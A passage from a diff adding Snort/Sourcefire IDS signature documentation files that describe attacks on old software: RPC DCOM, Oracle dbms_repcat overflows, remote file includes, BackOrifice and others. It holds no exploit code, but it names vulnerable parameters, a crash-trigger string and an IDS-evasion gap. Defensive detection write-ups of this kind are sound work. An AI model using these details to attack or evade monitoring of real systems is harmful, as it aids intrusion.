+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2951.txt
@@ -0,0 +1,59 @@
+Rule:
+
+--
+Sid:
+2951
+
+--
+Summary:
+This event is generated when multiple stacked SMB requests are made.
+
+--
+Impact:
+Possible IDS evasion.
+
+--
+Detailed Information:
+This event is generated when multiple stacked SMB requests are detected.
+This behavior does not occur on a regular basis in normal network
+traffic. This event may indicate an attempt to evade an IDS.
+
+--
+Affected Systems:
+	All systems using SMB.
+
+--
+Attack Scenarios:
+An attacker might create multiple stacked SMB requests in an attempt to
+bypass an IDS.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+If the second and third stacked requests are of a combined length that
+is less than 37 bytes this rule will not generate an event.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+Disallow the use of SMB.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/100000672.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+100000672
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "Harpia" application running on a webserver. 
+Access to the file "users.php" using a remote file being passed as the 
+"header_prog" parameter may indicate that an exploitation attempt has been 
+attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "header_prog" parameter in the "users.php" script used 
+by the "Harpia" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Harpia
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/305.txt
@@ -0,0 +1,57 @@
+Rule:
+
+--
+Sid: 305
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a buffer overflow condition in ElectroTechnical Laboratories Delegate proxy server.
+
+--
+Impact:
+Serious. System compromize presenting the attacker with the opportunity to gain remote access to the victim host with the privileges of the root user.
+
+--
+Detailed Information:
+Numerous buffer overflow conditions exist in ElectroTechnical Laboratories Delegate proxy server. It is possible for a remote attacker to gain a root shell on the victim host.
+
+Affected Systems:
+	ETL Delegate 5.9.x
+	ETL Delegate 6.0.x
+
+--
+Attack Scenarios:
+Exploit scripts are available
+
+--
+Ease of Attack:
+Simple. Exploits are available.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Original rule writer unkown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0165
+
+Bugtraq:
+http://www.securityfocus.com/bid/808
+
+--
--- /dev/null
+++ b/doc/signatures/2161.txt
@@ -0,0 +1,59 @@
+Rule:
+
+--
+Sid:
+2161
+
+
+--
+Summary:
+This event is generated when a possible outgoing virus is detected. 
+
+--
+Impact:
+Informational event. An virus on an infected host may be attempting to 
+propogate.
+
+--
+Detailed Information:
+This event indicates that an outgoing email message possibly containing 
+a virus has been detected.
+
+This rule generates an event when a filename extension commonly used by 
+viruses is detected.
+
+--
+Affected Systems:
+Any host.
+
+--
+Attack Scenarios:
+This is indicative of a virus infection.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+A legitimate attachment to an email may generate this event.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check the host for signs of virus infection.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/390.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+
+Sid:
+390
+
+--
+
+Summary:
+This event is generated when an ICMP Alternate Host Address datagram is detected on the network.  This ICMP Type is not documented in an RFC, but may be implemented by routing equipment to direct hosts to the correct IP address or neighboring hosts.
+
+--
+
+Impact:
+This ICMP Type is not implemented in most standard operating systems and is a potential indication of information gathering activities.
+
+--
+
+Detailed Information:
+ICMP Type 6 (Alternate Host Address)  is not defined in an RFC and should not be considered legitimate network traffic.  
+
+--
+
+Attack Scenarios:
+Attackers may use this ICMP Type to gather information about the network.
+--
+
+Ease of Attack:
+Numerous tools and scripts can generate ICMP Alternate Host Address datagrams.
+
+--
+
+False Positives:
+None known
+
+--
+
+False Negatives:
+None known
+
+--
+
+Corrective Action:
+ICMP Type 6 datagrams should be blocked at the firewall.
+
+--
+
+Contributors:
+Original Rule wirter unknown
+Sourcefire Research Team
+Matthew Watchinski (matt.watchinski@sourcefire.com)
+
+--
+
+Additional References:
+None
+
+
+--
--- /dev/null
+++ b/doc/signatures/2379.txt
@@ -0,0 +1,64 @@
+Rule:  
+
+--
+Sid:
+2379
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in Checkpoint VPN-1.
+
+--
+Impact:
+Unauthorized administrative access to Checkpoint VPN-1 systems
+
+--
+Detailed Information:
+Checkpoint VPN-1, SecuRemote and SecureClient contain an error that
+affects the processing of large Certificate requests to the VPN service.
+By sending a large amount of data in the Certificate Request payload an
+attacker may cause a buffer overflow condition to occur, presenting an
+opportunity to execute code of their choosing with the privileges of the
+user running the service, usually root.
+
+--
+Affected Systems:
+	CheckPoint Software FW-1 1.4.1 Service packs prior to SP6
+	CheckPoint Software FW-1 Next Generation FP1, FP0
+	CheckPoint Software VPN-1 1.4.1 SP5a
+	CheckPoint Software VPN-1 Next Generation FP1, FP0
+
+--
+Attack Scenarios:
+An attacker could supply a large Certificate Request payload containing
+code to be executed on the system.
+
+--
+Ease of Attack:
+Proof of concept code exists.
+
+--
+False Positives:
+None known
+
+--
+False Negatives:
+None known
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software
+
+Apply the appropriate vendor supplied patches
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1479.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1479
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/116.txt
@@ -0,0 +1,104 @@
+Rule:
+Backdoor.BackOrifice
+
+--
+Sid:
+112, 116
+
+--
+Summary:
+Backdoor.BackOrifice is a Trojan Horse.
+
+Server Port: 31337 although in later versions this port can be changed
+to a value between 1 and 65535
+Protocol: UDP although in later versions TCP can also be used
+
+--
+Impact:
+Possible theft of data and control of the targeted machine leading to a
+compromise of all resources the machine is connected to. This Trojan
+also has the ability to delete data, steal passwords and disable the
+machine.
+
+--
+Detailed Information:
+This Trojan affects the following operating systems:
+
+	Windows 95
+	Windows 98
+	Windows ME
+	Windows NT
+
+The Trojan changes system registry settings to add the BackOrifice sever
+to programs normally started on boot. Due to the nature of this Trojan
+it is unlikely that the attacker's client IP address has been spoofed.
+
+The default name of the server application is UMGR32, which can be
+changed on first use. The new application may be installed in the system
+or system32 direcory and the original may also be deleted.
+
+Event messages relating to activity from this Trojan are:
+
+	SID	Message
+	---	-------
+	112	BackOrifice access (outgoing TCP connection)
+	116	BackOrifice access (incoming UDP connection)
+
+--
+Attack Scenarios:
+This Trojan may be delivered to the target in a number of ways. This
+event is indicative of an existing infection being activated. Initial
+compromise can be in the form of a Win32 installation program that may
+use the extension ".jpg" or ".bmp" when delivered via e-mail for
+example.
+
+--
+Ease of Attack:
+This is Trojan activity, the target machine may already be compromised.
+Updated virus definition files are essential in detecting this Trojan.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+
+Edit the system registry to remove the extra keys or restore a
+previously known good copy of the registry.
+
+Affected registry keys are:
+
+	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services
+
+HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
+
+HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices
+
+Registry keys added may vary, look for spurious entries in the above
+locations.
+
+BackOrifice may hide the process from viewing inthe Windows task
+manager. A reboot of the infected machine is recommended.
+
+--
+Contributors:
+Original Rule Writer Max Vision <vision@whitehats.com>
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Whitehats arachNIDS
+http://www.whitehats.com/info/IDS399
+
+Symantec Security Response
+http://www.symantec.com/avcenter/venc/data/back.orifice2000.trojan.html
+
+--
--- /dev/null
+++ b/doc/signatures/3355.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3355
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1816.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1816
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a PHP web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a PHP application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the PHP application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running PHP applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying PHP script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1018.txt
@@ -0,0 +1,64 @@
+Rule:
+
+--
+Sid:
+1018
+
+
+--
+Summary:
+This event is generated when an attempt is made to request an HTTP-based password change.
+
+--
+Impact:
+Information gathering/remote access.  Error messages from failed password changes can indicate whether a given account exists on the server.  Successful password changes can allow remote access to the server. 
+
+--
+Detailed Information:
+Microsoft Internet Information Services (IIS) version 4 supplies a feature to allow users to make remote password changes.  The iisadmpwd directory has several .HTR files that are used to implement the password changes.  An attacker can request a change and use a returned form to supply an account name, existing password, and new password either to attempt brute force changes or to discover whether a specific account name exist. 
+
+--
+Affected Systems:
+
+Microsoft IIS 4.0
+
+--
+Attack Scenarios:
+An attacker can request password changes to discover existing accounts or attempt brute force password changes.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Remove the IISADMPWD virtual directory to disable remote password changes.
+
+Consider running the IIS Lockdown Tool to disable HTR functionality.
+
+--
+Contributors:
+Original rule writer unknown
+Modified by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+CVE
+http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-1999-0407
+
+Bugtraq
+http://www.securityfocus.com/bid/2110
+
+
+--
--- /dev/null
+++ b/doc/signatures/100000339.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000339
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "V-Webmail" application running on a webserver. Access to the file "core.php" using a remote file being passed as the "CONFIG[pear_dir]" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "CONFIG[pear_dir]" parameter in the "core.php" script used by the "V-Webmail" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using V-Webmail
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/2850.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2850
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure create_mview_repobject
+. This procedure is included in
+dbms_repcat.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1647.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1647
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2730.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2730
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure add_site_priority_site
+. This procedure is included in
+dbms_repcat.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2706.txt
@@ -0,0 +1,78 @@
+Rule: 
+
+--
+Sid: 
+2706
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in Microsoft GDI using a malformed JPEG image.
+
+This rule does not generate an event, however, Sid 2707 depends
+on this rule to function properly.
+
+-- 
+
+Impact: 
+Serious. Execution of arbitrary code is possible. Denial of Service
+(DoS),
+
+--
+Detailed Information:
+The Microsoft Graphics Device Interface contains a programming error
+in the handling of Joint Photographics Experts Group (JPEG) files. This
+error may allow an attacker to execute code of their choosing on a
+vulnerable system.
+
+Due to the popularity of jpeg files, and in order to provide accurate
+detection for the GDI JPEG vulnerability, sid 2705 may generate false
+positive events in certain situations. Since this rule may generate
+a number of false positives it is disabled by default.
+
+In order to avoid potential evasion techniques, http_inspect should be
+configured with "flow_depth 0" so that all HTTP server response traffic is
+inspected.
+
+WARNING
+Setting flow_depth 0 will cause performance problems in some situations.
+WARNING
+
+--
+Affected Systems:
+	All Microsoft systems including multiple Microsoft products
+
+--
+Attack Scenarios: 
+An attacker would need to supply a malformed jpeg image to a victim and
+have the use attempt to view the file.
+
+-- 
+Ease of Attack: 
+Medium.
+
+-- 
+
+False Positives:
+False positive events are known to occur with this rule, the incidence
+is low but may be an inconvenience in some installations.
+
+--
+False Negatives:
+None known.
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patches.
+
+--
+Contributors: 
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2394.txt
@@ -0,0 +1,57 @@
+Rule:
+
+--
+Sid:
+2394
+
+--
+Summary:
+This event is generated when a malformed request is sent to the Compaq Web-Based Management Agent.
+
+--
+Impact:
+Denial of service.
+
+--
+Detailed Information:
+Compaq Web-Based Management Agent is used to perform remote system administration for Windows hosts.  A vulnerability exists in the software when traffic is sent t
+o access to Compaq Web-Based Management Agent that contains a malformed request, possibly causing the service to crash.  URL requests that contain the characters "
+<!>" or "<!" followed by arguments followed by ">" cause the denial of service to occur.  Note that the rule uses an initial keyword of "content" instead of "urico
+ntent" since uricontent only examines web server ports identified in the pre-processor http_inspect in the configuration setup.  Default configurations do not incl
+ude port 2301 as a web server port, preventing the event from being generated.
+
+--
+Affected Systems:
+Host running Compaq Web-Based Management Agent.
+
+--
+Attack Scenarios:
+An attacker can send a malformed request to the listening service, causing the system to crash.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Block inbound port 2301 traffic or restrict access to known authorized IP addresses.
+
+--
+Contributors:
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+Additional References:
+
+bugtraq
+http://www.securityfocus.com/bid/8014
+
+--
--- /dev/null
+++ b/doc/signatures/3363.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3363
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2731.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2731
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure add_unique_resolution
+. This procedure is included in
+dbms_repcat.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1865.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1865
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2544.txt
@@ -0,0 +1,64 @@
+Rule:
+
+--
+Sid:
+2544
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in the Microsoft implementation of SSL Version 3.
+
+--
+Impact:
+Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in the handling of SSL Version 3 requests that
